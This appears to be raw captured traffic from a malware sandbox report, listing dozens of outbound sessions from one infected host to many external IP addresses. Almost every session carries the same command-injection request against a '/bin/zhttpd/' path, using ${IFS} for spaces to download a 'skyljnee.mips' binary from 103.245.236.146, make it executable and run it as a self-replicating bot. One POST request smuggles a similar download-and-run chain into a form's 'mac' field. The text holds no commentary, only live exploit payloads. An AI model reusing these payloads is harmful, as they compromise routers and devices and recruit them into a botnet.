                                                Jan 28, 2024 10:16:23.785339117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4094192.168.2.234571072.76.13.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.785388947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4095192.168.2.233765474.21.192.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.785408020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4096192.168.2.2352320163.139.180.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.785429001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4097192.168.2.235292420.124.2.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.785450935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4098192.168.2.234363094.239.129.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.785480976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4099192.168.2.2353682114.75.180.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.785517931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4100192.168.2.2338760191.166.55.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.785553932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4101192.168.2.233362290.70.118.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.785578012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4102192.168.2.2342962170.3.126.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.785590887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4103192.168.2.2334400190.219.223.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.785614967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4104192.168.2.2336318166.121.190.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.785640955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4105192.168.2.2350262166.81.43.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.785665035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4106192.168.2.2353234160.203.243.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.785710096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4107192.168.2.2352330166.144.52.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.785739899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4108192.168.2.234232437.138.55.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.785784960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4109192.168.2.233591454.234.212.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.785794020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4110192.168.2.233297679.233.176.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.785816908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4111192.168.2.2345126190.242.116.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:23.788193941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4112192.168.2.2339224223.206.1.2518080
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.042794943 CET245OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4113192.168.2.234857219.232.75.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.795335054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4114192.168.2.2358566123.26.76.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.795360088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4115192.168.2.235264872.136.241.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.795384884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4116192.168.2.234570651.82.167.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.795406103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4117192.168.2.2336228103.190.72.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.795430899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4118192.168.2.234303093.62.37.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.795469046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4119192.168.2.2349658156.34.51.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.795495987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4120192.168.2.2355432117.112.72.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.795526028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4121192.168.2.2349644172.155.189.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.795545101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4122192.168.2.2332790151.156.228.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.795586109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4123192.168.2.233775658.209.226.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.795619011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4124192.168.2.234015044.13.44.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.795655012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4125192.168.2.2335386185.224.78.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.795676947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4126192.168.2.2343478110.144.207.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.795717001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4127192.168.2.235533884.219.57.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.795722961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4128192.168.2.2343958103.61.3.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.795768976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4129192.168.2.2352850112.228.36.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.795800924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4130192.168.2.2357656100.146.156.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.795805931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4131192.168.2.2339158131.58.198.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.795836926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4132192.168.2.2360652105.220.123.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.795862913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4133192.168.2.234319857.52.159.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.795903921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4134192.168.2.23377722.85.150.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.795919895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4135192.168.2.2336544156.104.21.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.795958996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4136192.168.2.2352978148.99.121.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.795964956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4137192.168.2.233801046.251.129.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.795998096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4138192.168.2.233489014.98.91.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.796026945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4139192.168.2.233327248.168.104.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.796050072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4140192.168.2.233326269.245.146.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.796087027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4141192.168.2.233877271.185.184.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.796103954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4142192.168.2.233566253.77.93.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.796119928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4143192.168.2.233851462.134.126.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.796171904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4144192.168.2.235997852.42.96.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.796170950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4145192.168.2.2346930111.179.31.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.796221972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4146192.168.2.2351126124.198.84.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.796243906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4147192.168.2.2352442142.0.180.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.796273947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4148192.168.2.2351172221.32.148.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.796282053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4149192.168.2.2341520115.159.158.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.796308994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4150192.168.2.236060046.152.155.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.796375036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4151192.168.2.2348972109.27.145.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.796394110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4152192.168.2.2354836159.239.164.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.796433926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4153192.168.2.234667243.89.157.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.796466112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


